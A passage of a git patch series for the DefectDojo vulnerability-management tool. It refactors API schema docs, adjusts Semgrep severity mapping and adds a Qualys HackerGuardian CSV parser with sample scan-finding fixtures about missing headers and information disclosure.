2024 16:15:17 -0500 Subject: [PATCH 45/62] Prefetch Serialization: Add a preference during mapping (#10933) --- dojo/api_v2/prefetch/prefetcher.py | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/dojo/api_v2/prefetch/prefetcher.py b/dojo/api_v2/prefetch/prefetcher.py index 79a4b0e7314..3596b3f9409 100644 --- a/dojo/api_v2/prefetch/prefetcher.py +++ b/dojo/api_v2/prefetch/prefetcher.py @@ -3,11 +3,17 @@ from rest_framework.serializers import ModelSerializer +from dojo.models import FileUpload + from . import utils # Reduce the scope of search for serializers. SERIALIZER_DEFS_MODULE = "dojo.api_v2.serializers" +preferred_serializers = { + FileUpload: "FileSerializer", +} + class _Prefetcher: @staticmethod @@ -31,7 +37,11 @@ def _is_model_serializer(obj): for _, serializer in available_serializers: model = serializer.Meta.model - serializers[model] = serializer + if model in preferred_serializers: + if serializer.__name__ == preferred_serializers[model]: + serializers[model] = serializer + else: + serializers[model] = serializer # We add object->None to have a more uniform processing later on serializers[object] = None From 4d9bf9a5841d2594067110b5a17620b2efd8c70c Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:15:54 -0500 Subject: [PATCH 46/62] Manage Images: Do not display thumbnail for PDF (#10932) --- dojo/templatetags/display_tags.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/dojo/templatetags/display_tags.py b/dojo/templatetags/display_tags.py index 19a63541d38..6dcbcb2873d 100644 --- a/dojo/templatetags/display_tags.py +++ b/dojo/templatetags/display_tags.py @@ -69,10 +69,10 @@ "mark_finding_duplicate": "Mark as duplicate", } -supported_file_formats = [ +supported_thumbnail_file_formats = [ "apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", - "png", "svg", "webp", "pdf", + "png", "svg", "webp", ] @@ -860,7 +860,7 @@ def jira_change(obj): def get_thumbnail(file): from pathlib import Path file_format = Path(file.file.url).suffix[1:] - return file_format in supported_file_formats + return file_format in supported_thumbnail_file_formats @register.filter From 072a18557bfd2897270a6cdbb1ae5bd87308d836 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:16:37 -0500 Subject: [PATCH 47/62] Prefetching: Add swagger docs for models already supporting prefetching (#10931) * Prefetching: Add swagger docs for models already supporting prefetching * Fix Flake8 * Correct unit tests --- dojo/api_v2/views.py | 369 +++++++------------------------------------ 1 file changed, 57 insertions(+), 312 deletions(-) diff --git a/dojo/api_v2/views.py b/dojo/api_v2/views.py index 05d16521069..b36924640b8 100644 --- a/dojo/api_v2/views.py +++ b/dojo/api_v2/views.py @@ -172,6 +172,33 @@ logger = logging.getLogger(__name__) +def schema_with_prefetch() -> dict: + return { + "list": extend_schema( + parameters=[ + OpenApiParameter( + "prefetch", + OpenApiTypes.STR, + OpenApiParameter.QUERY, + required=False, + description="List of fields for which to prefetch model instances and add those to the response", + ), + ], + ), + "retrieve": extend_schema( + parameters=[ + OpenApiParameter( + "prefetch", + OpenApiTypes.STR, + OpenApiParameter.QUERY, + required=False, + description="List of fields for which to prefetch model instances and add those to the response", + ), + ], + ), + } + + class DojoOpenApiJsonRenderer(OpenApiJsonRenderer2): def get_indent(self, accepted_media_type, renderer_context): if accepted_media_type and "indent" in accepted_media_type: @@ -211,30 +238,7 @@ def get_queryset(self): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class DojoGroupViewSet( PrefetchDojoModelViewSet, ): @@ -252,30 +256,7 @@ def get_queryset(self): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class DojoGroupMemberViewSet( PrefetchDojoModelViewSet, ): @@ -301,6 +282,7 @@ def partial_update(self, request, pk=None): # Authorization: superuser +@extend_schema_view(**schema_with_prefetch()) class GlobalRoleViewSet( PrefetchDojoModelViewSet, ): @@ -315,6 +297,7 @@ def get_queryset(self): # Authorization: object-based +# @extend_schema_view(**schema_with_prefetch()) class EndPointViewSet( PrefetchDojoModelViewSet, ): @@ -370,6 +353,7 @@ def generate_report(self, request, pk=None): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class EndpointStatusViewSet( PrefetchDojoModelViewSet, ): @@ -398,6 +382,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class EngagementViewSet( PrefetchDojoModelViewSet, ra_api.AcceptedRisksMixin, @@ -651,6 +636,7 @@ def download_file(self, request, file_id, pk=None): return generate_file_response(file_object) +@extend_schema_view(**schema_with_prefetch()) class RiskAcceptanceViewSet( PrefetchDojoModelViewSet, ): @@ -716,6 +702,7 @@ def download_proof(self, request, pk=None): # These are technologies in the UI and the API! # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class AppAnalysisViewSet( PrefetchDojoModelViewSet, ): @@ -734,6 +721,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class CredentialsViewSet( PrefetchDojoModelViewSet, ): @@ -747,6 +735,7 @@ def get_queryset(self): # Authorization: configuration +@extend_schema_view(**schema_with_prefetch()) class CredentialsMappingViewSet( PrefetchDojoModelViewSet, ): @@ -1486,6 +1475,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class JiraIssuesViewSet( PrefetchDojoModelViewSet, ): @@ -1511,6 +1501,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class JiraProjectViewSet( PrefetchDojoModelViewSet, ): @@ -1573,6 +1564,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class ProductAPIScanConfigurationViewSet( PrefetchDojoModelViewSet, ): @@ -1599,30 +1591,7 @@ def get_queryset(self): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class DojoMetaViewSet( PrefetchDojoModelViewSet, ): @@ -1646,30 +1615,7 @@ def get_queryset(self): return get_authorized_dojo_meta(Permissions.Product_View) -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductViewSet( prefetch.PrefetchListMixin, prefetch.PrefetchRetrieveMixin, @@ -1745,30 +1691,7 @@ def generate_report(self, request, pk=None): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductMemberViewSet( PrefetchDojoModelViewSet, ): @@ -1796,30 +1719,7 @@ def partial_update(self, request, pk=None): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductGroupViewSet( PrefetchDojoModelViewSet, ): @@ -1847,30 +1747,7 @@ def partial_update(self, request, pk=None): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductTypeViewSet( PrefetchDojoModelViewSet, ): @@ -1955,30 +1832,7 @@ def generate_report(self, request, pk=None): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductTypeMemberViewSet( PrefetchDojoModelViewSet, ): @@ -2020,30 +1874,7 @@ def partial_update(self, request, pk=None): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class ProductTypeGroupViewSet( PrefetchDojoModelViewSet, ): @@ -2071,6 +1902,7 @@ def partial_update(self, request, pk=None): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class StubFindingsViewSet( PrefetchDojoModelViewSet, ): @@ -2109,6 +1941,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class TestsViewSet( PrefetchDojoModelViewSet, ra_api.AcceptedRisksMixin, @@ -2316,30 +2149,7 @@ def get_queryset(self): return Test_Type.objects.all().order_by("id") -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class TestImportViewSet( PrefetchDojoModelViewSet, ): @@ -2398,6 +2208,7 @@ def get_queryset(self): # Authorization: configurations +@extend_schema_view(**schema_with_prefetch()) class ToolConfigurationsViewSet( PrefetchDojoModelViewSet, ): @@ -2418,6 +2229,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class ToolProductSettingsViewSet( PrefetchDojoModelViewSet, ): @@ -2502,30 +2314,7 @@ def destroy(self, request, *args, **kwargs): # Authorization: superuser -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class UserContactInfoViewSet( PrefetchDojoModelViewSet, ): @@ -2680,30 +2469,7 @@ def get_queryset(self): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class LanguageViewSet( PrefetchDojoModelViewSet, ): @@ -3147,30 +2913,7 @@ def get_queryset(self): # Authorization: superuser -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class NotificationsViewSet( PrefetchDojoModelViewSet, ): @@ -3184,6 +2927,7 @@ def get_queryset(self): return Notifications.objects.all().order_by("id") +@extend_schema_view(**schema_with_prefetch()) class EngagementPresetsViewset( PrefetchDojoModelViewSet, ): @@ -3303,6 +3047,7 @@ def get_queryset(self): return Engagement_Survey.objects.all().order_by("id") +@extend_schema_view(**schema_with_prefetch()) class QuestionnaireAnsweredSurveyViewSet( prefetch.PrefetchListMixin, prefetch.PrefetchRetrieveMixin, From 09500cead339e12c650a40b726f81f13a8f62d7f Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:17:31 -0500 Subject: [PATCH 48/62] Semgrep Parser: Add new severities (#10936) --- dojo/tools/semgrep/parser.py | 11 ++- .../semgrep/high-medium-low-severities.json | 95 +++++++++++++++++++ unittests/tools/test_semgrep_parser.py | 6 ++ 3 files changed, 108 insertions(+), 4 deletions(-) create mode 100644 unittests/scans/semgrep/high-medium-low-severities.json diff --git a/dojo/tools/semgrep/parser.py b/dojo/tools/semgrep/parser.py index aa4f7307503..e64615ec53b 100644 --- a/dojo/tools/semgrep/parser.py +++ b/dojo/tools/semgrep/parser.py @@ -130,13 +130,16 @@ def get_findings(self, filename, test): return list(dupes.values()) def convert_severity(self, val): - if "CRITICAL" == val.upper(): + upper_value = val.upper() + if upper_value == "CRITICAL": return "Critical" - elif "WARNING" == val.upper(): + elif upper_value in ["WARNING", "MEDIUM"]: return "Medium" - elif "ERROR" == val.upper() or "HIGH" == val.upper(): + elif upper_value in ["ERROR", "HIGH"]: return "High" - elif "INFO" == val.upper(): + elif upper_value == "LOW": + return "Low" + elif upper_value == "INFO": return "Info" else: msg = f"Unknown value for severity: {val}" diff --git a/unittests/scans/semgrep/high-medium-low-severities.json b/unittests/scans/semgrep/high-medium-low-severities.json new file mode 100644 index 00000000000..c2fd9c8714b --- /dev/null +++ b/unittests/scans/semgrep/high-medium-low-severities.json @@ -0,0 +1,95 @@ + { + "errors": [], + "interfile_languages_used": [], + "paths": { + "scanned": [] + }, + "results": [ + { + "check_id": "rules.sast.dev.generic.internal.detect-cdn-usage-react-express", + "end": { + "col": 89, + "line": 48, + "offset": 1772 + }, + "extra": { + "engine_kind": "OSS", + "fingerprint": "d30b51e68d2d56fb34e5a87920208e0f18b71dbec62b2ad91d1b55e566c5796c64b1e161d7fd3c0f65834756474c0617c29b7c5bd76b76f14f2d3fc537a664b9_0", + "is_ignored": false, + "lines": "", + "message": "Potential CDN usage detected. Consider removing or replacing CDN references to comply with GDPR and also avoid supply chain risk", + "metadata": { + "category": "security", + "technology": "cdn" + }, + "metavars": {}, + "severity": "LOW", + "validation_state": "NO_VALIDATOR" + }, + "path": "/Users/user.example/git/company/full-codebase/company/lead-magnet/src/templates/base.html.twig", + "start": { + "col": 1, + "line": 48, + "offset": 1684 + } + }, + { + "check_id": "rules.sast.dev.generic.internal.detect-cdn-usage-react-express", + "end": { + "col": 206, + "line": 49, + "offset": 1978 + }, + "extra": { + "engine_kind": "OSS", + "fingerprint": "d30b51e68d2d56fb34e5a87920208e0f18b71dbec62b2ad91d1b55e566c5796c64b1e161d7fd3c0f65834756474c0617c29b7c5bd76b76f14f2d3fc537a664b9_1", + "is_ignored": false, + "lines": "", + "message": "Potential CDN usage detected. Consider removing or replacing CDN references to comply with GDPR and also avoid supply chain risk", + "metadata": { + "category": "security", + "technology": "cdn" + }, + "metavars": {}, + "severity": "LOW", + "validation_state": "NO_VALIDATOR" + }, + "path": "/Users/user.example/git/company/full-codebase/company/lead-magnet/src/templates/base.html.twig", + "start": { + "col": 1, + "line": 49, + "offset": 1773 + } + }, + { + "check_id": "rules.sast.dev.generic.internal.detect-cdn-usage-react-express", + "end": { + "col": 203, + "line": 50, + "offset": 2181 + }, + "extra": { + "engine_kind": "OSS", + "fingerprint": "d30b51e68d2d56fb34e5a87920208e0f18b71dbec62b2ad91d1b55e566c5796c64b1e161d7fd3c0f65834756474c0617c29b7c5bd76b76f14f2d3fc537a664b9_2", + "is_ignored": false, + "lines": "{% block javascripts %}{% endblock %}", + "message": "Potential CDN usage detected. Consider removing or replacing CDN references to comply with GDPR and also avoid supply chain risk", + "metadata": { + "category": "security", + "technology": "cdn" + }, + "metavars": {}, + "severity": "LOW", + "validation_state": "NO_VALIDATOR" + }, + "path": "/Users/user.example/git/company/full-codebase/company/lead-magnet/src/templates/base.html.twig", + "start": { + "col": 1, + "line": 50, + "offset": 1979 + } + } + ], + "skipped_rules": [], + "version": "1.84.1" +} \ No newline at end of file diff --git a/unittests/tools/test_semgrep_parser.py b/unittests/tools/test_semgrep_parser.py index 6892b0b8494..8729e4cc006 100644 --- a/unittests/tools/test_semgrep_parser.py +++ b/unittests/tools/test_semgrep_parser.py @@ -121,6 +121,12 @@ def test_parse_issue_8435(self): findings = parser.get_findings(testfile, Test()) self.assertEqual(1, len(findings)) + def test_parse_low_medium_high_severity(self): + with open("unittests/scans/semgrep/high-medium-low-severities.json", encoding="utf-8") as testfile: + parser = SemgrepParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(3, len(findings)) + def test_parse_sca_deployments_vulns(self): with open("unittests/scans/semgrep/sca-deployments-vulns.json", encoding="utf-8") as testfile: parser = SemgrepParser() From a69b67e2a292d5668894e5eb0fcf558ac0f8b831 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:18:44 -0500 Subject: [PATCH 49/62] New Parser: Qualys Hacker Guardian (#10937) * New Parser: Qualys Hacker Guardian * Restore unit tests * Fix ruff * Update docs/content/en/integrations/parsers/file/qualys_hacker_guardian.md Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --------- Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --- .../parsers/file/qualys_hacker_guardian.md | 9 +++ dojo/tools/qualys_hacker_guardian/__init__.py | 0 dojo/tools/qualys_hacker_guardian/parser.py | 77 +++++++++++++++++++ .../qualys_hacker_guardian/many_finding.csv | 5 ++ .../qualys_hacker_guardian/one_finding.csv | 3 + .../qualys_hacker_guardian/zero_finding.csv | 1 + .../test_qualys_hacker_guardian_parser.py | 46 +++++++++++ 7 files changed, 141 insertions(+) create mode 100644 docs/content/en/integrations/parsers/file/qualys_hacker_guardian.md create mode 100644 dojo/tools/qualys_hacker_guardian/__init__.py create mode 100644 dojo/tools/qualys_hacker_guardian/parser.py create mode 100644 unittests/scans/qualys_hacker_guardian/many_finding.csv create mode 100644 unittests/scans/qualys_hacker_guardian/one_finding.csv create mode 100644 unittests/scans/qualys_hacker_guardian/zero_finding.csv create mode 100644 unittests/tools/test_qualys_hacker_guardian_parser.py diff --git a/docs/content/en/integrations/parsers/file/qualys_hacker_guardian.md b/docs/content/en/integrations/parsers/file/qualys_hacker_guardian.md new file mode 100644 index 00000000000..e938970a385 --- /dev/null +++ b/docs/content/en/integrations/parsers/file/qualys_hacker_guardian.md @@ -0,0 +1,9 @@ +--- +title: "Qualys Hacker Guardian Scan" +toc_hide: true +--- +Qualys Hacker Guardian CSV export + +### Sample Scan Data + +Sample Qualys Scan scans can be found [here](https://github.com/DefectDojo/django-DefectDojo/tree/master/unittests/scans/qualys_hacker_guardian). \ No newline at end of file diff --git a/dojo/tools/qualys_hacker_guardian/__init__.py b/dojo/tools/qualys_hacker_guardian/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/qualys_hacker_guardian/parser.py b/dojo/tools/qualys_hacker_guardian/parser.py new file mode 100644 index 00000000000..0baea41ac6e --- /dev/null +++ b/dojo/tools/qualys_hacker_guardian/parser.py @@ -0,0 +1,77 @@ +import csv +import io + +from dateutil import parser as date_parser + +from dojo.models import Endpoint, Finding + + +class QualysHackerGuardianParser: + """Parser for Qualys HackerGuardian""" + + # Severity mapping taken from + # https://qualysguard.qg2.apps.qualys.com/portal-help/en/malware/knowledgebase/severity_levels.htm + qualys_severity_lookup = { + "1": "Low", + "2": "Low", + "3": "Medium", + "4": "High", + "5": "High", + } + + def get_scan_types(self): + return ["Qualys Hacker Guardian Scan"] + + def get_label_for_scan_types(self, scan_type): + return "Qualys Hacker Guardian Scan" + + def get_description_for_scan_types(self, scan_type): + return "Qualys Hacker Guardian report file can be imported in CSV format." + + def get_endpoint(self, row): + host = row.get("HOSTNAME", row.get("IP")) + if (port := row.get("PORT")) is not None: + host += f":{port}" + if (protocol := row.get("PROTOCOL")) is not None: + host = f"{protocol}://{host}" + + return host + + def get_findings(self, filename, test): + if filename is None: + return () + content = filename.read() + if isinstance(content, bytes): + content = content.decode("utf-8") + reader = csv.DictReader(io.StringIO(content), delimiter=",", quotechar='"') + dupes = {} + for row in reader: + endpoint = Endpoint.from_uri(self.get_endpoint(row)) + finding = Finding( + title=row.get("VULN TITLE"), + severity=self.qualys_severity_lookup[row.get("Q_SEVERITY", 1)], + description=( + f'**Category**: {row.get("CATEGORY", "Unknown")}\n' + f'**Threat**: {row.get("THREAT", "No threat detected")}\n' + f'**Result**: {row.get("RESULT", "No threat detected")}\n' + ), + date=date_parser.parse(row.get("LAST SCAN")), + impact=row.get("IMPACT"), + mitigation=row.get("SOLUTION"), + unique_id_from_tool=row.get("QID"), + dynamic_finding=True, + active=True, + nb_occurences=1, + ) + finding.unsaved_endpoints.append(endpoint) + + dupe_key = finding.unique_id_from_tool + if dupe_key in dupes: + finding = dupes[dupe_key] + if endpoint not in finding.unsaved_endpoints: + finding.unsaved_endpoints.append(endpoint) + finding.nb_occurences += 1 + else: + dupes[dupe_key] = finding + + return list(dupes.values()) diff --git a/unittests/scans/qualys_hacker_guardian/many_finding.csv b/unittests/scans/qualys_hacker_guardian/many_finding.csv new file mode 100644 index 00000000000..c2c6e210e78 --- /dev/null +++ b/unittests/scans/qualys_hacker_guardian/many_finding.csv @@ -0,0 +1,5 @@ +"IP","HOSTNAME","LAST SCAN","QID","VULN TITLE","TYPE","SEVERITY","PORT","PROTOCOL","OPERATING SYSTEM","IS_PCI","FALSE POSITIVE STATUS","CVSS_BASE","Q_SEVERITY","THREAT","IMPACT","SOLUTION","CVSS_TEMPORAL","CATEGORY","RESULT","BUGTRAQID","CVEID" +"18.238.109.17","help.example.co","2024-09-16 04:00:30","150059","Reference to Windows file path is present in HTML","POTENTIAL","M","80","tcp","","Y","-","5.3","1","Windows specific file path was detected in the response.","The response may be an error response that disclosed a local file path. This may potentially be a sensitive information.","The content should be reviewed to determine whether it could be masked or removed.","4.7","Web Application","url: https://help.example.co/ matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl url: https://help.example.co/. matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl","-","" +"18.238.109.17","help.example.co","2024-09-16 04:00:30","150059","Reference to Windows file path is present in HTML","POTENTIAL","M","443","tcp","","Y","-","5.3","1","Windows specific file path was detected in the response.","The response may be an error response that disclosed a local file path. This may potentially be a sensitive information.","The content should be reviewed to determine whether it could be masked or removed.","4.7","Web Application","url: https://help.example.co/ matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl","-","" +"44.207.58.177","jt.example.co","2024-09-15 09:00:18","11827","HTTP Security Header Not Detected","CONFIRMED","M","443","tcp","","Y","-","5.3","2","This QID reports the absence of the following HTTP headers according to CWE-693: Protection Mechanism Failure:
    X-Content-Type-Options: This HTTP header will prevent the browser from interpreting files as a different MIME type to what is specified in the Content-Type HTTP header.
    Strict-Transport-Security: The HTTP Strict-Transport-Security response header (HSTS) allows web servers to declare that web browsers (or other complying user agents) should only interact with it using secure HTTPS connections and never via the insecure HTTP protocol.

    QID Detection Logic:
    This unauthenticated QID looks for the presence of the following HTTP responses:
    The Valid directives are as belows: X-Content-Type-Options: nosniff

    Strict-Transport-Security: max-age=< [;includeSubDomains]

    ","Depending on the vulnerability being exploited an unauthenticated remote attacker could conduct cross-site scripting clickjacking or MIME-type sniffing attacks.","Note: To better debug the results of this QID it is requested that customers execute commands to simulate the following functionality: curl -lkL --verbose.

    CWE-693: Protection Mechanism Failure mentions the following - The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product. A "missing" protection mechanism occurs when the application does not define any mechanism against a certain class of attack. An "insufficient" protection mechanism might provide some defenses - for example against the most common attacks - but it does not protect against everything that is intended. Finally an "ignored" mechanism occurs when a mechanism is available and in active use within the product but the developer has not applied it in some code path.

    Customers are advised to set proper X-Content-Type-Options and Strict-Transport-Security HTTP response headers.

    Depending on their server software customers can set directives in their site configuration or Web.config files. Few examples are:

    X-Content-Type-Options:
    Apache: Header always set X-Content-Type-Options: nosniff

    HTTP Strict-Transport-Security:
    Apache: Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"
    Nginx: add_header Strict-Transport-Security max-age=31536000;

    Note: Network devices that include a HTTP/HTTPS console for administrative/management purposes often do not include all/some of the security headers. This is a known issue and it is recommend to contact the vendor for a solution.

    ","4.7","CGI","X-Content-Type-Options HTTP Header missing on port 443. GET / HTTP/1.1 Host: jt.example.co Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 jt edge server ver v1.42.0-1-g7a7022e4 / 2022-06-09T21:08:14.000000Z jt edge server ver v1.42.0-1-g7a7022e4 / 2022-06-09T21:08:14.000000Z. Configure jt (/configurator) Strict-Transport-Security HTTP Header missing on port 443. HTTP/1.1 200 OK Date: Sun 15 Sep 2024 09:12:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 274 Connection: keep-alive Server: nginx/1.21.6","-","" +"44.220.118.158","data.example.co","2024-09-16 04:00:30","150004","Predictable Resource Location Via Forced Browsing","CONFIRMED","M","80","tcp","","Y","-","5.3","2","A file directory or directory listing was discovered on the Web server. These resources are confirmed to be present based on our logic. Some of the content on these files might have sensitive information.

    NOTE: Links found in 150004 are found by forced crawling so will not automatically be added to 150009 Links Crawled or the application site map. If links found in 150004 need to be tested they must be added as Explicit URI so they are included in scope and then will be reported in 150009. Once the link is added to be in scope (i.e. Explicit URI) this same link will no longer be reported for 150004.","The contents of this file or directory may disclose sensitive information.","It is advised to review the contents of the disclosed files. If the contents contain sensitive information please verify that access to this file or directory is permitted. If necessary remove it or apply access controls to it.","4.7","Web Application","url: https://data.example.co/wp-content/uploads/2023/01/image.png Payload: https://data.example.co/feed/image/ comment: Found this Vulnerability for redirect link: https://data.example.co/wp-content/uploads/2023/01/image.png. It was redirected from: https://data.example.co/feed/image/. Original URL is: https://data.example.co/feed/ matched: HTTP/1.1 200 OK url: 